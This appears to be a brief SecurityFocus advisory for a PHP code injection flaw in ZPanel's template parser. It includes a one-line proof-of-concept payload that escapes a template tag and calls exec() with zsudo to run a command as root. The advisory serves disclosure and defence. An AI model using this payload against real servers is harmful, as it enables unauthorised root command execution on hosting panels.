ZPanel 'templateparser.class.php' PHP Code Injection Vulnerability

Attackers can exploit this issue through a browser.

The following proof-of-concept is available:

<& bogus']; exec("/etc/zpanel/panel/bin/zsudo touch /root/derp"); echo $value['bogus &>


 

Copyright 2010, SecurityFocus